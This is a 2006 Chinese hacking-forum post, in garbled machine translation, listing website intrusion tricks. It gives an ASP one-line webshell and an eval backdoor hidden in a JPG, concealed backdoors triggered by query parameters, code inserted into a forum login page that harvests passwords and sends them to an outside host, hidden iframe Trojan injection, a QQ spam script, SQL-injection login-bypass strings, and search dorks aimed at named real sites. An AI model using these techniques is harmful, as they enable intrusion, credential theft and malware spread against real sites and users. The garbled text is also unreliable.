Let you become the ASP Trojan master-vulnerability warning-the black bar safety net

ID MYHACK58:62200613311
Type myhack58
Reporter 佚名
Modified 2006-12-17T00:00:00


  1. Name: how to make a picture of the ASP Trojan can display pictures Built an asp file, the content of<!-- # of i nclude file="ating.jpg"--> 找 一 个 正常 图片 ating.jpg, insert the word Trojan,such as the ice Fox, with ultraedit to hex compiled, insert a picture, for

A Run is successful, but also to search<%and % >,which becomes 0 0,(don't replace your own asp),and then put the jpg file at the beginning of the join <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request. form(#)+) </SCRIPT>

2. Name: tricky cafe First with Elite cafe auxiliary tool to get a username and password, and then Computer Management coupled to a machine, open the telnet,connection, open sharing,

Copy one of the Trojan horses last run can be.

3. Name: feel MD5 brute force charm rainbowcrack usage first with rtgen to generate library "rtgen md5 byte 1 7 5 2 4 0 0 4 0 0 0 0 all" 1 and 7 represents the password minimum and maximum length Al statin I then added a method: http://md5.rednoize.com/ online hack Or to http://www. md5lookup. com/? category=01-3&searck=on

  1. A lot of times we dofree killTrojan, do not understand the compilation, with the Beidou packers will be able to escape the kill, there are a lot of packers, everyone Trojans packers

The best time to multi-select unknown add shell software

5. Name: covert insertion type ASP Trojan (1)in our to tricks of the asp file added the following contents <%if request("action")="ok" then%> the shell code is inserted here, is best pony, but also to encrypt it <%end if%> Visit time on your hand leg of the asp files back plus? action=ok,you can (2)another method, in the our to tricks of the asp file added the following contents <% on error resume next strFileName = Request. QueryString("filer") set objStream = Server. createObject("ABODB. Stream") objStream. Type = 1 objStream. Open objStream. LoadFromFile strFileName objStream. SaveToFile Server. mappath("ating. asp"),2 %> Access the time in the tricks of the asp files back plus? filer=XXX XXX is your local upload of a path such as c:ating123.asp After uploading the tricks of the asp in the same folder with ating,asp (3)the premise to give the system permission, and Go to the website directory under a layer of mkdir s... copy ating. asp s.../ This antivirus software not found Visit http://website/s.../ating. asp can be

6. 工具 http://hack520.tengyi.cn/chaojiyonghu.rar this tool in the computer to generate a super-user user name:

hack password 1 1 0, in DOS and the computer Manager can't see your build of the user, and is deleted.

7. Name: QQ group scripting attacks Open the qq dialogue, deceive, copy the message, and then The following content is saved as. vbs file, run it Set WshShell= WScript. createobject("WScript. Shell") WshShell. AppActivate "QQ information attack script" for i=1 to 2 0 WScript. Sleep 1 0 0 0 WshShell. SendKeys"^v" WshShell. SendKeys i WshShell. SendKeys "%s" Next

8. Search: program production: WAN Peng free application space to directly upload asp the horse can be

9. Name: full find out where you stand on the ASP Trojan (1) with antivirus software (2) for FTP client software, click"Tools"->"comparing folders" (3) with asplist2. 0. asp upload to the site the space review, the General features of ASP I estimated that the ASP Trojan (4) Using tool Beyond Compare

1 0 name: expand ideas to get DVBBS account "one man's Bible"of animation (1)the previously obtained webshell want to enter DVBBS background,want the administrator password, it can be The old way: Modify admin_login. asp plaintext DVBBS backstage password In"username=trim(replace(request("username")this line behind Dim fsoObject Dim tsObject Set fsoObject = Server. createObject("Scripting. FileSystemObject") set tsObject = fsoObject. createTextFile(Server. MapPath("laner.txt")) tsObject. Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing As long as the administrator login background, 在目录下就生成了laner.txt (2)login. asp in Case "login_chk"the following: on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&request("username")&"text:"&request("password")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing Such a laner. asp will get all of the login person login time, user name and password (3)If you have your own website or another webshell(strongly recommended): You can create a directory laner,on the inside create an empty laner. asp and the following code in the rain. asp: <%if request("n")<>"" and request("p")<>"" then on error resume next Dim rain set rain=server. createobject("adodb. stream") rain. Type=2 rain. CharSet="gb2312" rain. Position=rain. Size rain. Open rain. LoadFromFile server. MapPath("laner. asp") rain. writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(1 0) rain. SaveToFile server. MapPath("laner. asp"),2 rain. Close set rain=nothing end if%>

1 1. Name: the use of QQ online status of catch the pigeon broiler Generate a qq-line state, the inside address into the Trojan address, sent to the forum In the login. asp where to insert the sentence: response. write"<scriptsrc=http://www. ptlushi. com/laner/rain. asp? n="&request("username")

&""&"&p="&request("password")&"></script>" response. write"<iframesrc=http://yourwebsite/laner/rain. asp? n="&request("username")

&""&"&p="&request("password")&"></iframe>" The results of all of the landing people will obediently put the name and password sent to your laner. asp.

1 2. Animation name: the media in China the entire Station program exists multiple vulnerabilities Vulnerability program:media China the entire Station program(first edition) Official website:http://meiti. elgod. com/ Vulnerability: %5c(storm) upload injection Upload page:down1/upload. asp

1 3. Name: Free Phone + MSH command-line tool http://www.globe7.com/ open the home page, Click sit down angle, Free DownLoad, download to a local, installation, After running, it will prompt The are looking for your area code. Because it is international calls, register for an account, sent 1 0 0 cents, the domestic timing

0.01/min, you have 1 0 0 -Can white play. Is an account Oh. Should be noted that, the fixed telephone, PHS form is 0 0 8 6 5 2 1 1 2 3 4 5 6 5 2 1 Original 0 5 2 1, to omit the preceding zero, the phone number also

Is the same.

1 4. Name: Bo-Blog a new vulnerability http:// 网址 /index.php?job=../admin/ban To which"prohibits search of the words"that part of the<table>save out, inside of the address change is complete, insert the word Trojan

1 5. Name: hook soul's invasion of legend private server With Baidu search for legendary inurl:tuku Or legendary inurl:wplm.htm Or again the legendary inurl:coolsites. asp Links to insert the word Trojan can be

1 6. Program: hongda enterprise entire Station upload vulnerability Official home page:http://www. mu126. com/ Vulnerability page:/cx/upfile. asp (upload vulnerability)

1 7. No Pirates of the mailbox, modify the password, user name and password in the Add or=or

1 8. Name: bbsxp5. 1 6 the background to get webshell bbsxp5. 1 6 the filter of the asp,asp,cdx,cer,the extension of the file to upload is in the basic settings on the Add On the upload type also is not, and ban

Check the modified data of the backup data names, we can put this web page saved locally, modified the source code uploaded.

1 9. Name: JHACKJ 2 0 0 5 years latest classic tutorial Download look at it, good, each big website have

2 0. Name: effort the invasion of South Korea broiler In the? D of the scan of the injection point item, open this: http://www.google.co.kr/advanced_search?hl=zh-CN This is the Advanced Search Terms, Keywords, just write. Here I write asp? name= set to display per page 1 0 0. Language selection of Korean. Search, a lot of sa.

2 1. Name: any Internet cafe management system crack Selected smart ABC, then vv is input, the cursor backward two steps, press the delete key just enter the two vv delete Finally, press the Inter key

2 2. the Name: crack the QQ space to insert a web page Trojan's code Now Tencent has been sealed a lot more QQ space code, just as before <iframe src="Trojan address" name="lcx" width="0"

height="0" frameborder="0"></iframe>insert pages the Trojan code also first to be terminated. Break disable method code is as follows: <div id=DI><img src="javascript :DI. innerHTML=\<iframe src=Trojan address width=1 9 0 height=1 9 0

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"


Finally attach Kara is ok to summarize the 1. Upload vulnerability[does not speak] pS: if you see:Choose your file to upload [re-upload]or there is a"please login", 8 0% there is a loophole! Sometimes the upload will not necessarily be successful,it is because Cookies are not the same. We will use WSockExpert made Cookies. Then use the DOMAIN upload.

  1. Injection vulnerability[does not speak] pS:the MD5 password. Sometimes we are not? easy to run out. If it is the[SQL Database]. Then we can use the following command: http:// 注入 网址;update admin set password=\new MD5 password\ where password=\old MD5 password\--

[admin is the table name.]

  1. Side note,that is across the station. We invaded a station may be the station sturdy invulnerable, we can find the next and this station the same server of the site, and then in the use of this

Site with a mention of the right, sniffing and other methods to the invasion we want to invade the site., the Here there is a difficulty, is some of the server absolute path to the

Through encryption, it will see we've got a

  1. Storm library:put two directories in the middle of the/is replaced by%5c EY:http://www. ahttc. edu. cn/otherweb/dz/bgs/BigClass. asp? BigClassName=mandate&BigClassType=1 If you can see:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的路径 the. To determine the path

The path name is spelled correctly, and whether the connection to the File Storage Server. This is the database. Download with FLASHGET into. MDB format.

5.\ or\=\or\this is a can connect to the SQL language phrase. You can go directly to the background. I collect a bit. Similar: \or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a

  1. Social engineering. This we all know. Just guess the solution. EY: the http://www.neu.edu.cn/waishi/admin admin waishi

  2. Written in ASP format database. Is the word Trojan[<%execute request("value")%>], commonly used in the guestbook. EY: the http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[this is the ASP format of the database], and then write the word


  1. Source: some web site with online download source code. Some webmasters very dish. What also does not change. EY:http://www. ahsdxy. ah. edu. cn/xiaoyoulu/index. asp This station used is: outstanding alumni, the source I have, Default database/webshell path: databaseliangu_data. the mdb backend management: adm_login. asp password and user name are


  1. Default database/webshell path use:such a lot of sites/people to others of the WEBSHELL. /Databackup/dvbbs7. MDB /bbs/Databackup/dvbbs7. MDB /bbs/Data/dvbbs7. MDB /data/dvbbs7. mdb /bbs/diy. asp /diy. asp /bbs/cmd. asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe Tools: website, Hunter mining chicken EY: the http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

1 0. View a directory of law:the people some of the site can disconnect a directory, you can asked party directory. EY: the http://www.ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ So we can find database, download I don't need to teach.

1 1. Tool the overflow:. asp? NewsID= a /2j. asp? id=1 8 . asp? id=[this method can get a lot of WEBSHELL]

1 2. Search engines use:

(1). inurl:flasher_list. asp default database:database/the flash. the mdb backend/manager/ (2). Looking for website management background address: site:xxxx. comintext:management site:xxxx. comintitle:management <keyword many, since have been looking for> site:xxxx. cominurl:login (3). Find access database,mssql, mysql connection files allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb My master does not do. Self do do.

1 3. The COOKIE trick: put your own ID modified to the Administrator's MD5 password is also modified to his, with Guilin veterans of the tools you can modify COOKIES.

This I will not speak more

1 4. The use of a Common Vulnerability: such as dynamic network BBS EY: the http://js1011.com/bbs/index.asp You can start with:dvbbs privilege elevation tool, so that the self has become the front Desk administrator. THEN, the use of:dynamic network solid top patch tool, find a solid-top patch, and then made COOKIES, this to your self do. We can use WSockExpert

Made Cookies/the NC package This I will not do, online tutorials, self-have a look. Tools: dvbbs privilege elevation tool to automatically mesh the solid top of the patch tool

1 5. There are some old vulnerabilities. As IIS3, 4 view the source code, to 5 delete CGI, PHP some of the old hole, I will not say. Too old. There is nothing Dayong.